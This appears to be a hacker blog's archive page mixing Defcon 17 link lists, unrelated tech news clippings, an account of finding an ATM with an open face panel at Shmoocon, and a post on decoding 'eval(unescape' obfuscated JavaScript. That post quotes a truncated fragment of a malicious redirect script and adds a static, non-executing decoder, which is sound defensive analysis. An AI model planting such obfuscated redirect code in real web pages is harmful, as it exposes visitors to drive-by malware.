Tech


Here we will try to sort out all the news, blogs, tools and more. Check back for updates and comment any findings.

Videos:
Defcon 17 Awards Ceremony **Check out I-Hacked/RBCP @ 01:04:56**
Interview Nathan Hamiel and Shawn Moyer on hacking Web 2.0
Quadrotor UAV at Defcon 17
Apple keyboard with evil firmware can root any computer
hacking-defcon-2009-badge
video of KreiosC2
Hacking the iPhone
Defcon Video by Ax0n

Tools/Slides:
dnsTTrap
ucsniff
ippon
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Foca Online
Tactical Fingerprinting using Foca
maltego-firefox
CSRF – Yeah, It Still Works
KreiosC2
Prank o Matic

Photos:
vissago
stits -some NSFW-
epitti

Music:
BlackBall Defcon 17- up’D by Great Scott

Misc/Blog:
Black Hat USA 2009 Media Archives
Ax0n’s DefCon 17 Wrap-Up
RBCP’s Blog on Defcon
DEFCON 0x11 Post-Mortem

News:
Feds at DefCon Alarmed After RFIDs Scanned
Researchers offer tools for eavesdropping and video hijacking
Danger from automatic updates
Hanging with hackers can make you paranoid
Rio hotel in Las Vegas responds to claims over malicious ATMs
Malicious ATM Catches Hackers
iPhone attacked by SMS – Danger!

Also known as “eval( unescape” decryption

Recently, @surbo was working an investigation where he came across some obfuscated code which was innocuously included in an otherwise un-threatening HTML file. He had noticed that the result of the code was to push the client to a .js file which was being hosted on a .cn domain. (that can't be good)

However, when viewing the source of the HTML page, he was presented with a fairly common technique often called “Encrypting HTML”, which really should be considered “Obfuscating HTML” because all that the programmer has done is convert “human readable” code into “Human-Unreadable, yet Browser-Readable” code. Below is a small extract of this obfuscated code.

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d"));</script>

He needed a way to easily de-obfuscate this, and came up with something I feel is very clever: rewrite eval as alert and save the result to a local file.

Re-Written:
<script>alert( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d"));</script>

When the file is loaded into a browser, this causes the BROWSER to translate the obfuscated code into human-readable form and hand it to you in a nice alert box, allowing you to copy and paste!

Well, this is an easy way to do it by hand if you are ever in a pinch. But if you are using Firefox, I suggest you check out JavaScript Deobfuscator.
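
The same decoding can be done without loading the suspect file in a browser at all. The following is an added example, not code from the original post or from @surbo: it joins the quoted fragments and percent-decodes them as plain text, never evaluating anything, and peels nested eval(unescape(...)) layers up to a cap. The function names are hypothetical and the sample input is the extract quoted above.

```javascript
// Constructed sample: the extract quoted in the post, with its closing quote restored.
const SAMPLE_HTML = '<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+' +
  '"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+' +
  '"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d"));</script>';

// Concatenate quoted fragments joined by "+" WITHOUT evaluating them.
// Anything that is not a plain string literal is rejected for manual review.
function joinStringLiterals(expr) {
  const fragment = /\s*(?:"([^"\\]*)"|'([^'\\]*)')\s*(\+|$)/y;
  let out = '';
  let pos = 0;
  while (pos < expr.length) {
    fragment.lastIndex = pos;
    const m = fragment.exec(expr);
    if (!m) throw new Error('non-literal content at offset ' + pos);
    out += m[1] !== undefined ? m[1] : m[2];
    pos = fragment.lastIndex;
  }
  return out;
}

// Decode %XX and %uXXXX as legacy unescape() does; malformed escapes stay literal.
function percentDecode(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Return the decoded text of every eval(unescape(...)) call found in the input.
// The argument must not contain literal parentheses (true for this encoding style).
function deobfuscate(html) {
  const call = /eval\s*\(\s*unescape\s*\(([^()]*)\)\s*\)/g;
  return Array.from(html.matchAll(call),
    (m) => percentDecode(joinStringLiterals(m[1])));
}

// Decoded output may itself be another eval(unescape(...)); peel up to maxLayers.
function peelLayers(html, maxLayers = 5) {
  const layers = [];
  let current = html;
  for (let i = 0; i < maxLayers; i++) {
    const found = deobfuscate(current);
    if (found.length === 0) break;
    current = found.join('\n');
    layers.push(current);
  }
  return layers;
}
```

Run under Node, `peelLayers(SAMPLE_HTML)` returns each decoded layer as a string that can be read or logged without any of it being executed.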

via New Scientist

A firm that has designed habitats for plants and animals living in microgravity now hopes to grow the first flowers on the moon, the company’s founders announced on Friday.

Engineering firm Paragon Space Development plans to build a greenhouse to fly to the moon. It is set to travel on a lunar lander designed by Odyssey Moon, a competitor for the Google Lunar X Prize, a $30 million contest to send an unmanned lunar rover to the moon.

The greenhouse will be used to incubate fast-growing mustard seeds on the lunar surface, in the hopes of producing flowering plants and an iconic image that could be as thrilling as the Apollo images of Earth-rise over the lunar surface.

Last night I put out a post on twitter informing that the Shmoocon ATM had been compromised, and everyone who had used it should cancel & reissue their cards. This of course got retweeted a bunch, and then FINALLY some security people started commenting that we should have some evidence before they take action.

So some may have seen the ATMs in the hotel were “tagged” with this prank and thought that THIS was the compromise I was referring to.

This was funny, and I have a pretty good idea who put it there. (and really if it was “them” I would think twice of touching that ATM anyways) But it was not a compromise.

@surbo and I were running late to the airport, and the taxi driver wouldn't take a card. Having spent all our cash the night before, we ran over to the ATM located in the main hallway of the Marriott (across from the hotel convenience store) and I tried the ATM. It was acting very odd, it was taking about 5 minutes to change screens, and it was NOT TAKING MY PIN on my card, and occasionally told me that it could not read the card. I got a very bad feeling, but I was in a hurry, so I tried another card. Same story — acting weird not taking my pin. I asked Surbo to give it a go, and this time it took his pin, but it was still acting weird.

Surbo then did something that made us both say “F&^K”. He pulled the facepanel down off the ATM exposing the internal computer and authentication “dialer”, someone had either picked or left the panel unlocked. (the safe panel ($$$$) remained locked). The electronics that control the authorization of funds were easily accessed. You can imagine what a person of “low moral standards” could have benefited from this situation.

Right about the time that Surbo pulled the front panel down, Mouse came strolling by and said “Boys! What are you doing!?” It didn't look good, and since we had already had some run-ins with hotel police we immediately put it back and made sure it was reported. We didn't take any pictures because we didn't want to be any more involved than we already were. I am sure you can understand that although we pull some harmless pranks here or there, ATM fraud is not up our alley.


So, do I have evidence that if you used that ATM that your card numbers & pin were exposed and/or recorded? No, in fact I did not see any suspicious looking equipment inside that would indicate that it had, however the security of the ATM was compromised and the potential was definitely there. Don’t risk it, if you used this ATM, please call your bank and get your card reissued.

Update: I have now learned that the ATMs were using the default admin password. (crap see comments below)

from news.cnet

The auto-suggest feature of Google’s new Chrome browser does more than just help users get where they are going. It will also give Google a wealth of information on what people are doing on the Internet besides searching.

from Yahoo! News

Intel on Thursday showed off a wireless electric power system that analysts say could revolutionize modern life by freeing devices from transformers and wall outlets.

Intel chief technology officer Justin Rattner demonstrated a Wireless Energy Resonant Link as he spoke at the California firm’s annual developers forum in San Francisco.

Electricity was sent wirelessly to a lamp on stage, lighting a 60 watt bulb that uses more power than a typical laptop computer.

Most importantly, the electricity was transmitted without zapping anything or anyone that got between the sending and receiving units.

“The trick with wireless power is not can you do it; it’s can you do it safely and efficiently,” Intel researcher Josh Smith said in an online video explaining the breakthrough.

YouTube – Google Earth Demo
Video demonstration of F-Secure’s WorldMap data in Google Earth.
http://www.f-secure.com/weblog/

from consumerist

The Consumerist’s 3-month sting operation snared a Geek Squad technician stealing porn from our hard drive, and we’ve got the work-safe video and logfiles to prove it.

from shacknews

A Sony Computer Entertainment representative has confirmed to Shacknews that developers can now take full advantage of the PSP’s CPU following the late May release of the system’s version 3.50 firmware. Rumors of the unlocking were initially reported by fansite PSP Updates via an unnamed source.

Previously, developers were only able to run the CPU at 266MHz rather than its full potential clock speed of 333MHz, though most games ran at only 222MHz. High Impact Games’ Ratchet & Clank: Size Matters, released in February, is said to run at 266MHz. Hackers long ago discovered methods to run the PSP’s CPU at full speed, the benefits of which include a smoother framerate for certain games, at the cost of reduced battery life. There is no word yet if this update enables previous PSP releases to run at 333MHz, something hacked PSP firmware has enabled in the past.

It is widely believed that the PSP CPU was underclocked to increase the portable’s battery life. Some speculate that the availability of the portable’s full CPU speed affirms recent rumors of an upcoming redesign, which supposedly includes a brighter screen, a slimmer profile, and increased battery life. Such a system would be better equipped to deal with the greater power demands of the unthrottled CPU.

from Engadget

Reports of MacBook Pros getting crazy-hot because of misapplied thermal grease have been floating around for a year now, and it doesn’t look like the recent bump to Santa Rosa has changed anything. A reader at the MacRumors forums noticed his week-old MBP getting a little hot, so he bravely decided to pull the unit apart to check things out and found what he estimated to be forty times too much paste applied to the logic board. There are also a few threads on the Apple support site with similar pics of MBP logic boards slathered in grease, so this doesn’t appear to be an isolated issue. Apple hasn’t commented yet, but seeing as it managed to cool things down last time with a firmware update, we wouldn’t expect too much fanfare when this finally gets resolved.
